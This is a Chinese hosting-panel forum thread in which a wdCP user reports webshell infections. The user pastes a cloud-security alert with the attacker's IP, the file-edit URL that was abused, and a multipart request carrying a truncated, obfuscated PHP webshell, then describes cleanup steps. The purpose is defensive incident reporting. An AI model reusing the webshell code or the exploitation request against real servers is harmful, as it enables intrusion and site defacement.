无标题文档
wdCP系统 (介绍,功能特性,运行环境,安装说明,演示,常见问题,使用教程) wdCDN系统 (介绍,功能特性,运行环境,安装说明,演示,常见问题,使用手册)
wdOS系统 (介绍,功能特性,运行环境,安装说明,演示,常见问题,使用教程) wdDNS系统 (介绍,功能特性,运行环境,安装说明,演示,常见问题,使用手册)
注册 发贴 提问 回复-必看必看 wddns免费智能 DNS 开通 本地或虚拟机使 用wdcp 一键包在mysql编 译时"卡住"
【300G高防】双线 无视攻击 wdcp官方技术支持/服务 阿里云8折优惠券 无敌云 腾讯云优惠中,现注册更有260代金额券赠送
返回列表 发帖
steven001

Rank: 1
1# 跳转到 »
发表于 2018-11-14 09:32 | 显示全部帖子
提问三步曲: 提问先看教程/FAQ索引(wdcp,wdcp_v3,一键包)及搜索,会让你更快解决问题
1 提供详细,如系统版本,wdcp版本,软件版本等及错误的详细信息,贴上论坛或截图发论坛
2 做过哪些操作或改动设置等

温馨提示:信息不详,很可能会没人理你!论坛有教程说明的,也可能没人理!因为,你懂的
XXXX:8080/sys/filee?act=edit&t=f&p=/www/web/XXXXXX/public_html/upload/201612/1482310143.php

我也是经常被挂马
通过这个地址挂上来的。这个是wdcp的文件吧

TOP

steven001

Rank: 1
2#
发表于 2018-11-14 13:43 | 显示全部帖子
回复 9# admin


肯定是没有登陆挂马。通过这个地址挂的,是阿里的 态势感知 提示的。并且是能够通过这个写入文件,以下是相关的信息。请尽快测试。谢谢!挂了好多马,并且跟楼主一样,在主页写入了博彩的相关信息,并进行了加密。javascript进行解密

疑似攻击者IP
222.247.108.16
入侵点URL

XXXXXX:8080/sys/filee?act=edit&t=f&p=/www/web/XXXXXXXX/public_html/upload/201612/1482310143.php
Http Payload

------WebKitFormBoundaryYlHudQYI8qGl61Qw
Content-Disposition: form-data; name="fn"

/www/web/XXXXXXX/public_html/upload/201612/1482310143.php
------WebKitFormBoundaryYlHudQYI8qGl61Qw
Content-Disposition: form-data; name="furl"

/sys/file?p=%2fwww%2fweb%2fwww_XXXXX_com%2fpublic_html%2fupload/201612&act=list&t=d
------WebKitFormBoundaryYlHudQYI8qGl61Qw
Content-Disposition: form-data; name="contents"

<?php error_reporting(0);$sr="st"./*+/*+*/"rr"/*+/*+*/."ev";$id=$sr/*+/*+*/("ri"."d_"."si");$rn=$sr/*+/*+*/("em"."an"."er");$dn=$sr/*+/*+*/("em"."anr"."id");$od=$sr/*+/*+*/("ri"."dne"."po");$rd=$sr/*+/*+*/("ri"."dda"."er");$cd=$sr/*+/*+*/("ri"."deso"."lc");$fpc=$sr/*+/*+*/("stn"."etn"."oc_t"."up_e"."lif");$fgc=$sr/*+/*+*/("stn"."etn"."oc_t"."eg_e"."lif");$muf=$sr/*+/*+*/("eli"."f_d"."eda"."olp"."u_e"."vom");$dlform='<form method="post">FN:<input name="fn" size="20" type="text">URL:<input name="url" size="50" type="text"><input type="submit" value="ok"></form>';$ulform='<form method="post" enc
Http user_agent

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
被写入的可疑文件路径

/www/web/XXXXXXpublic_html/upload/201612/1482310143.php
事件说明

云盾检测到有疑似黑客在通过WEB漏洞或者WEBSHELL向服务器写入WEBSHELL文件或可疑的二进制文件,请及时关注。
解决方案

请及时排查告警中的URL对应的磁盘文件是否存在漏洞,或者是否是WEBSHELL,并及时修复WEB漏洞及删除已存在的WEBSHELL文件。如果该URL接口是您网站正常的文件上传接口,请在控制台点击标记为误报或忽略按钮。

TOP

steven001

Rank: 1
3#
发表于 2018-11-14 15:10 | 显示全部帖子
目前我做了一个服务器策略,临时解决。所有目录不允许写入,upload目录允许写入但是不允许执行

TOP

steven001

Rank: 1
4#
发表于 2018-11-19 08:48 | 显示全部帖子
回复 12# admin

你好,管理员,这是阿里态势给出的提示,肯定是没有登陆的。密码我修改过,直接写入的文件。

TOP

steven001

Rank: 1
5#
发表于 2018-11-19 09:02 | 显示全部帖子
linux系统也没有新增用户,系统漏洞也清理了。

TOP

steven001

Rank: 1
6#
发表于 2018-11-20 14:01 | 显示全部帖子
回复 15# admin


wdcp的密码我修改过。态势里面提示了四十多条,所有的文件都是通过这个地址上传上来的。并没有干什么坏事,只是修改了主页的信息,让页面回跳到首页的时候跳到垃圾页面。所有上传的木马全部经过的加密处理。感觉这个是机器扫描直接植入的,而不是人工操作的。

TOP

steven001

Rank: 1
7#
发表于 2018-11-20 14:02 | 显示全部帖子
我现在已经吧wdcp修改了端口,也不知道什么原因,无法访问了,木马文件我根据阿里的提示已经删除,先看一段时间,看是否还能上传木马文件。

TOP

返回列表